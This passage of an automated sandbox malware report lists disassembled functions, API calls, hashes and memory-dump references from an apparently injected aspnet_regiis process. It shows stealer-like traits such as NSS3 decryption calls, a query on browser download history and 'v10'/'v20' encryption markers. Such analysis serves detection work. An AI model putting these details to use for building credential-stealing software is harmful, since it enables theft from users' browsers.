                                                                                                                                                                              • CERT_DecodeAVAValue.NSS3(?,?,6CB80A2C), ref: 6CB80E0F
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CB80A2C), ref: 6CB80E73
                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CB80A2C), ref: 6CB80E85
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000001,?,?,6CB80A2C), ref: 6CB80E90
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB80EC4
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CB80A2C), ref: 6CB80ED9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3618544408-0
                                                                                                                                                                              • Opcode ID: ec3a0544f4feb9f69d43436c58bebc14d5a17be56e82e71343c8ae2e95425544
                                                                                                                                                                              • Instruction ID: e314bbfe77c58a2847eb7582e90d13c538dc6e6451eba2516e47e666acfa6a3d
                                                                                                                                                                              • Opcode Fuzzy Hash: ec3a0544f4feb9f69d43436c58bebc14d5a17be56e82e71343c8ae2e95425544
                                                                                                                                                                              • Instruction Fuzzy Hash: C6212972E036D55BEB10496ABC85B6B72AEDBC16CBF194035DC1C63A12EB60D81482B3
                                                                                                                                                                              Function 6CC0EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CC0EE85
                                                                                                                                                                              • realloc.MOZGLUE(55CEB38C,?), ref: 6CC0EEAE
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CC0EEC5
                                                                                                                                                                                • Part of subcall function 6CBE0BE0: malloc.MOZGLUE(6CBD8D2D,?,00000000,?), ref: 6CBE0BF8
                                                                                                                                                                                • Part of subcall function 6CBE0BE0: TlsGetValue.KERNEL32(6CBD8D2D,?,00000000,?), ref: 6CBE0C15
                                                                                                                                                                              • htonl.WSOCK32(?), ref: 6CC0EEE3
                                                                                                                                                                              • htonl.WSOCK32(00000000,?), ref: 6CC0EEED
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CC0EF01
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1351805024-0
                                                                                                                                                                              • Opcode ID: 8bbd8a4ce09bc5150a45abe84e20908510f010fd4e91bbc7922c8a9a32f492ae
                                                                                                                                                                              • Instruction ID: b5fc451d87083522d3bb30fe0ab85a5933401141682c75a71100007d12a86ea6
                                                                                                                                                                              • Opcode Fuzzy Hash: 8bbd8a4ce09bc5150a45abe84e20908510f010fd4e91bbc7922c8a9a32f492ae
                                                                                                                                                                              • Instruction Fuzzy Hash: F721E571A002189FDF109F28DC8079AB7A4EF49758F15816DED599B641F731EC14CBE2
                                                                                                                                                                              Function 6CBBEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBBEE49
                                                                                                                                                                                • Part of subcall function 6CBDFAB0: free.MOZGLUE(?,-00000001,?,?,6CB7F673,00000000,00000000), ref: 6CBDFAC7
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CBBEE5C
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CBBEE77
                                                                                                                                                                              • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CBBEE9D
                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBBEEB3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 886189093-0
                                                                                                                                                                              • Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                                                              • Instruction ID: d1d908cf9d946d2c26f5ed265f1486360b3a5e9aed11b23597f75b9236282408
                                                                                                                                                                              • Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 1521D5B6A042906BEB518E58DC81EBF77A8EF45708F0901A4FD04AB751EB71EC1487F1
                                                                                                                                                                              Function 02A1210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • StrStrA.SHLWAPI(?,00000000,?,?,?,02A13794,00000000,00000010), ref: 02A12119
                                                                                                                                                                              • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 02A12132
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A12144
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A12156
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                              • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                              • API String ID: 1206339513-1572652216
                                                                                                                                                                              • Opcode ID: d3d9bea06968743f6c266b4c1608c28b81f9ab790b91f83a06199bc76cd5b0ea
                                                                                                                                                                              • Instruction ID: dc0e9d8ee283a0d51ea5775b14f1c172d3dec64b265785e96b920d12b99d39d7
                                                                                                                                                                              • Opcode Fuzzy Hash: d3d9bea06968743f6c266b4c1608c28b81f9ab790b91f83a06199bc76cd5b0ea
                                                                                                                                                                              • Instruction Fuzzy Hash: F5F0E9326003357FE7111F99DC48E9B7F6CEF455A5B000160F908E2201C771DBA586E5
                                                                                                                                                                              Function 6CB6AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB6AFDA
                                                                                                                                                                              Strings
                                                                                                                                                                              • unable to delete/modify collation sequence due to active statements, xrefs: 6CB6AF5C
                                                                                                                                                                              • misuse, xrefs: 6CB6AFCE
                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB6AFC4
                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB6AFD3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                              • API String ID: 632333372-924978290
                                                                                                                                                                              • Opcode ID: c7e13bc423ebc512f8e518a359d4110c8dacab274367f56d8e621ae52e626cbf
                                                                                                                                                                              • Instruction ID: 3b1ecd056848d6cb62cb957319bbc370159aded32493a64bd5b66f8d2ad6b6c0
                                                                                                                                                                              • Opcode Fuzzy Hash: c7e13bc423ebc512f8e518a359d4110c8dacab274367f56d8e621ae52e626cbf
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F91C175A012A58FDF04CF5AC850AAABBF1FF49314F1944A8E865ABB91D334ED01CF61
                                                                                                                                                                              Function 02A0826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A08307
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 02A0833C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocLocal_memset
                                                                                                                                                                              • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                                                                                              • API String ID: 52611349-380572819
                                                                                                                                                                              • Opcode ID: 8552555a36376632f7d8bce6af92106ced6a54857972e450cf2145b3482188ae
                                                                                                                                                                              • Instruction ID: 9d8b5b708447c309911f84c4886ef015a52dc7043636ab3a5a654dad80c0dd7a
                                                                                                                                                                              • Opcode Fuzzy Hash: 8552555a36376632f7d8bce6af92106ced6a54857972e450cf2145b3482188ae
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E4106B2A40208AFDB10DFB5DC81ADE7BB8AF44324F144561FD05E7184EF74D9458B95
                                                                                                                                                                              Function 02A0F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F2C7
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F2E6
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A0F320
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                              • API String ID: 3404309857-4289949731
                                                                                                                                                                              • Opcode ID: bf90613f61fbf687d7ed574022966d10e28f6da752e1bb9432d00f8e28439d30
                                                                                                                                                                              • Instruction ID: da6ff4dce36e1cc4c5296e1f728a289b319df907751da00040e42bd2c346ac53
                                                                                                                                                                              • Opcode Fuzzy Hash: bf90613f61fbf687d7ed574022966d10e28f6da752e1bb9432d00f8e28439d30
                                                                                                                                                                              • Instruction Fuzzy Hash: 7711C271300602AFDB24DF6CE9C0A59B3A6FF483247540559F826EBA82CF70E985CB91
                                                                                                                                                                              Function 02A092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A094AB
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A094C6
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                              • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                              • API String ID: 2500673778-2241552939
                                                                                                                                                                              • Opcode ID: 4de3e59d7c96bd14281313896d742448e583ee4583545dd042ba6c5701a3d115
                                                                                                                                                                              • Instruction ID: bf60aaf8e7c2736ba4fafff57ad7aedafdb4ced3ffb3b247faef06ca99d0aec6
                                                                                                                                                                              • Opcode Fuzzy Hash: 4de3e59d7c96bd14281313896d742448e583ee4583545dd042ba6c5701a3d115
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B71C931D80229ABDF01FFA4EE859DEB776BF04351B514421F910B71A0DF60AE598FA1
                                                                                                                                                                              Function 6CBA8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB94F1C), ref: 6CBA8EA2
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CBCF854
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CBCF868
                                                                                                                                                                                • Part of subcall function 6CBCF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CBCF882
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(04C483FF,?,?), ref: 6CBCF889
                                                                                                                                                                                • Part of subcall function 6CBCF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CBCF8A4
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CBCF8AB
                                                                                                                                                                                • Part of subcall function 6CBCF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CBCF8C9
                                                                                                                                                                                • Part of subcall function 6CBCF820: free.MOZGLUE(280F10EC,?,?), ref: 6CBCF8D0
                                                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB94F1C), ref: 6CBA8EC3
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CB94F1C), ref: 6CBA8EDC
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CBC2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CBA8EF1
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBA8F20
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1978757487-0
                                                                                                                                                                              • Opcode ID: a7a39792c7f26747bf9604d0ee3fd7291f43c1e6bfa810678d015551caeb58a7
                                                                                                                                                                              • Instruction ID: f2ee995c83554d915ac765883c72538c1c70acf2a3bc6b6b48008428053fb0cd
                                                                                                                                                                              • Opcode Fuzzy Hash: a7a39792c7f26747bf9604d0ee3fd7291f43c1e6bfa810678d015551caeb58a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 3D217E709096859FDB00AF69D08419DBBF4FF48314F41456EEC989BB41D731E855CBD2
                                                                                                                                                                              Function 02A25713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
